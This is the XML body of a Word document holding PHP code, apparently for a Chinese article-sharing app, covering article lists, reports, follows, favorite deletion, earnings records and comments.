    <w:p w14:paraId="38200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FDAB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_imgUrl() . '/' . $v['video'] . '?vframe/jpg/offset/2/w/300/h/200';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458D7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250A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1857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E3DD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create_time'] = date('m-d H:i', $v['create_time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAE5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weitoutiao'] == 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D28D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uandu = "?imageView2/1/w/180/h/124";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45899A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2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B025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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33042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pcList'] = json_decode($v['images'], true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425F8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6525C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lt;div class="aui-col-xs-12" style="height:11.5rem"&gt;&lt;img style="height:11.5rem" id="ffxiangImgCache" ffxiang-src="' . _imgUrl() . $v['image'] . '?imageView2/1/w/400/h/280" src="../image/loadingImage.png" /&gt;&lt;/div&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76734E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08CB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json_decode($v['images'], true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70ACA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images['0']['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5B6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lt;div class="aui-col-xs-12" style="height:11.5rem"&gt;&lt;img style="height:11.5rem" id="ffxiangImgCache" ffxiang-src="' . _imgUrl() . $images . '?imageView2/1/w/400/h/280" src="../image/loadingImage.png" /&gt;&lt;/div&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBB74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E7A12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images . '&lt;em class="aui-iconfont aui-icon-image"&gt; ' . count(json_decode($v['images'], true)) . ' </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>图</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/em&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C149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v['mychannel'] == 3) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB372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083388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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C15C7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username'] = $user['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A84C5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img'] = $user['img'] . "?imageView2/1/w/100/h/100";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429501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id'] = $user['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695E5E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4FC1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video'] = _imgUrl() . $v['video'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B8C3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v['mychannel'] == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6537A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24669B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src=\"(.*?)\"/", $v['content'], $img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F573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2] as $ka =&gt; $va) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204141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strstr($va, 'http')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027B2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va;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BDF6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trpos($va, '/public/uploads/us/') !== false) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9794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config['url'] . $va;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641A55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13EEF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t[] = _imgUrl() . $va;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4666B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D160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CE75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ArticleList'] = $contet;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687DE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E1B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EC552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description'] = _substr($v['description'], 100, '&lt;a&gt;...[</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>查看全文</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]&lt;/a&gt;');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630D1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mychannel'] == 3 || $v['video']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09880E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qiniu_video_type']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43986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video'] . '?vframe/jpg/offset/2/w/200/h/200';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D316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81A4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image']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73198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image'] . '?imageView2/1/w/300/h/200';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3513FD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E77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 . $v['video'] . '?vframe/jpg/offset/2/w/300/h/200';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C380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046B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9999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 = $image;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AFF9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206F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uandu = "?imageView2/1/w/200/h/200";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF548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json_decode(htmlspecialchars_decode($v['images']), true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD8F1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data'][$k]['images']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BF8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEB2F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8D6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k]['images'] as $ks =&gt; $vsa) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9127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data['data'][$k]['images']) == 1 || count($data['data'][$k]['images']) == 2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019A33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6";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BD9E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C667F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l = "aui-col-xs-4";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33435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36A5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s_array($vsa)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D832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sa = $vsa['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4DDB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F4F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Pro[] = _imgUrl() . $vsa;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C63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 .= '&lt;div class="' . $col . '" tapmode onclick="img(' . $v['id'] . ',' . $ks . ')"&gt;&lt;img id="ffxiangImgCache" ffxiang-src="' . _imgUrl() . $vsa . $kuandu . '" src="../image/loadingImage.png"&gt;&lt;/div&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7258A6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25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 = $images;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F9E8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agesPro'] = $imagesPro;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4AA0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0DE3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EE8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 ($v['uid']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E1F7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14F01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user) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2658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username'] = $user['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C258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img'] = $user['img'] . "?imageView2/1/w/100/h/100";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1758B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650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id'] = $user['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B716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A4AA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28F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data['data'][$k]['content']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FD0C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E684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6388DF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EEA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ubao()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239662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588D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param.aid/d') ? input('param.aid/d') : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3D9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input('param.content', '', 'strip_tags') ? input('param.content', '', 'strip_tags') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AF53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461A0B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gt; 'number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7042B4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require',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0D99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7E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7E08C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content,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6A9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4BD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77A488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E260D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14E64C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210E6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77B6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9624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p = _ip();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0668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p) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EBB5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4AE4A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IP</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>地区异常</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5F1E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5144D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0056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F6B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4D763B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jubao')-&gt;where(['aid' =&gt; $aid, 'uid' =&gt; $uid])-&gt;cache(_cache('db'))-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCE05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9C006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6BE6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您已经举报过啦</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207AD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24EF5B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D9CD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643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anzhi = Db::name('jubao')-&gt;where(['ip' =&gt; $ip])-&gt;whereTime('time', 'today')-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49666B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jianzhi &gt; 10) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793A9F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F87B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ianzhi = Db::name('jubao')-&gt;where(['uid' =&gt; $uid])-&gt;whereTime('time', 'today')-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA4D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jianzhi &gt; 10) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01735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json([</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41006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为防止恶意攻击，举报或反馈每天不超过</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>条，请明天再来举报或反馈</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D44D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13A51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48B1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DB85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6398D9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 = $aid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D2F4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 = $content;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D05DE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 = time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552FC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p'] = $ip;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24978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jubao')-&gt;insert($where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F967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1F17B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80900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举报成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5C63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69EE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DE6AC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583D9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0E3FF8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724C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0D37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1BC2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F9E1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serList()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4380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9D4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d', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217F79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3277C8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385314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3D3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55B3A1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67580E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41E1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5265B3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2A16F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262C76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2D34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3B54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33FB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hide'] = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464CED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102F0D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ARTICLE__ w', 'a.id=w.uid'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783131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463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gt;where($where)-&gt;alias('a')-&gt;join($join)-&gt;field('a.id')-&gt;group('w.uid')-&gt;order('a.id desc')-&gt;fetchSql(false)-&gt;paginate($pages)-&gt;toarray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3474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6642E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id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4B67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13DC26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7FC3DC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qianming'] = $user['qianming'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F533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guanzhu'] = Db::name('member_guanzhu')-&gt;where(['uid' =&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>$this-&gt;memberId, 'gz_uid' =&gt; $user['id']])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BB57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21F0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B1F2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B19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yjfk()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C72C0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5C3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d', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623DA7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2611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number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12061B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564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AF228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gt; $pages,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370208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FD31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036678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D1F61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07F9A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0FEF6E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811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2E3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this-&gt;memberId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BBEC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jubao')-&gt;where($where)-&gt;order('id desc')-&gt;fetchSql(false)-&gt;paginate($pages)-&gt;toarray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B612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0879C2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id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4233A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img'] = $user['img'] . "?imageView2/1/w/100/h/100";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AA5F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date('m-d H:i', $v['time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0C81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sername'] = $user['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CB7C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830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CEFDB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B6CF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clsDel()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7845C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7C9F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 ? input('id') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF406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d') ? input('type/d') : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBA69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0D75A2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require',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F994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BA4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76CDA6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id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A693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A91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31C316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436B7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623A06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67280B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48A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0CCF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s = explode(',', $id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0291DB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30987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ds as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64514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favorite')-&gt;where(['uid' =&gt; $uid, 'aid' =&gt; $v, 'type' =&gt; $type])-&gt;delete();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D13C0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cho 'db:' . $db . '  |  id:' . $v;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D210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C9E5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7EB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uanzhuzan()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4B28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4B04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6D072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z_uid = input('gz_uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47670B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aid/d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573640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id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57446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59ACC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A879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guanzhu'] = DB::name('member_guanzhu')-&gt;where(['uid' =&gt; $uid, 'gz_uid' =&gt; $gz_uid])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304FD4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zan'] = Db::name('article_zan')-&gt;where(['aid' =&gt; $aid, 'uid' =&gt; $uid])-&gt;value('zan');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019C2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FD533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1C3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toutiaoDel()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021ED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58BF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this-&gt;memberId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BEC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input('aid/d') ? input('aid/d') : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3FBA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aid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D305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 = $uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7C92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Db::name('article')-&gt;where($where)-&gt;delete();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590B6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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266ABC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uid, '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>删除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id . ',</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>删除成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BE8C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426D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删除成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C94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1B05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4A91E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records($uid, '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>删除文章</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' . $aid . ',</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>删除失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770B5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896ED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删除失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211C1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4CD54E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3FBD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5FF2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EAD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jindu_view()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FD90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977A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uid'] = $this-&gt;memberId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484833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content'] = ['like', '%</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>阅读收益</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>%'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E20F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3F79ED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_MEMBER__ b', 'a.uid = b.id'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43976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169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yaoqing_records')-&gt;alias('a')-&gt;join($join)-&gt;where($where)-&gt;whereTime('a.time', 'today')-&gt;order('a.time desc')-&gt;field('a.money,a.content,a.time,a.type,b.mobile,b.nickname,a.data,b.id')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579EC1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006348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username'] = _username($v);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE913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time'] = date('Y-m-d H:i', $v['time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378CEE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content'] = $v['content'] . (!$v['data'] ? '&lt;b class="sx-jia"&gt;+' : '&lt;b class="sx-jian"&gt;-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>') . ($v['type'] ? $v['money'] . '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' : _money($v['money']) . '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>元</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>') . '&lt;/b&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B8F4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94C3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uid'] = $this-&gt;memberId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04191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content'] = ['like', '%</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>阅读收益</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>%'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E921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type'] = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C2B8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_jinbi = Db::name('yaoqing_records')-&gt;where($num)-&gt;whereTime('time', 'today')-&gt;sum('money');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043EF9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type'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F031E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um_money = Db::name('yaoqing_records')-&gt;where($num)-&gt;whereTime('time', 'today')-&gt;sum('money');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A478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ata' =&gt; $data, 'num_money' =&gt; _money($num_money), 'num_jinbi' =&gt; $num_jinbi];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B514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1AD11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B3DF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omment()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C906D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C324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mit = input('limit/d') ? input('limit/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6862C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article_ping')-&gt;where(['aid_uid' =&gt; $this-&gt;memberId])-&gt;order('id desc')-&gt;fetchSql(false)-&gt;paginate($limit)-&gt;toarray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE5CC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data'] as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD84F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 = _user($v['uid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6AA1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user['id'] = $user['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBD7E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user['img'] = $user['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAB99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user['username'] = $user['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1525B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id_user'] = $uid_user;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624E53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 = Db::name('article')-&gt;field('id,title,mychannel,image,images,video,content,description,content,update_time')-&gt;cache(true)-&gt;find($v['aid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F8F0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7632CF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image']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1648E1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mychannel'] == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F041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img src=\"(.*?)\"/", $article['content'], $img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1003B4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img[1])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79211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 = $img[1][0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053CD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strpos($va, 'http') !== false) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093436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va;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331CAE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strpos($va, '/public/uploads/us/') !== false) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5801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config['url'] . $va;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41449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00942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va . '?imageView2/1/w/172/h/120';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA7F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8996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706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article['mychannel'] == 2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287A2F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sjson = json_decode($article['images'], true) ? json_decode($article['images'], true) : json_decode(htmlspecialchars_decode($article['images']), true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728D5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unt($imagsjson)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34107C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empty($imagsjson[0]['img']) ? $imagsjson[0]['img'] : $imagsjson[0]) . '?imageView2/1/w/172/h/120';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779601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D367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if ($article['mychannel'] == 3) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5939C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rticle['video']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183CE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article['video'] . </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>'?vframe/jpg/offset/2/w/172/h/120/format/jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A64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4DEE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D148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mpty($image)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDD53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config()['appConfig']['url'] . '/public/style/index/img/images.jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEAD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A0BC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E7972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 = _imgUrl() . $article['image'] . '?imageView2/1/w/172/h/120';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4423BB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D97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image'] = $image;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17821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article['content']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E807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article'] = $article;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04715D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url'] = url('article/view', ['id' =&gt; $v['aid']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C09AD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time'] = _time($v['time']);</w:t>
      </w:r>
    </w:p>
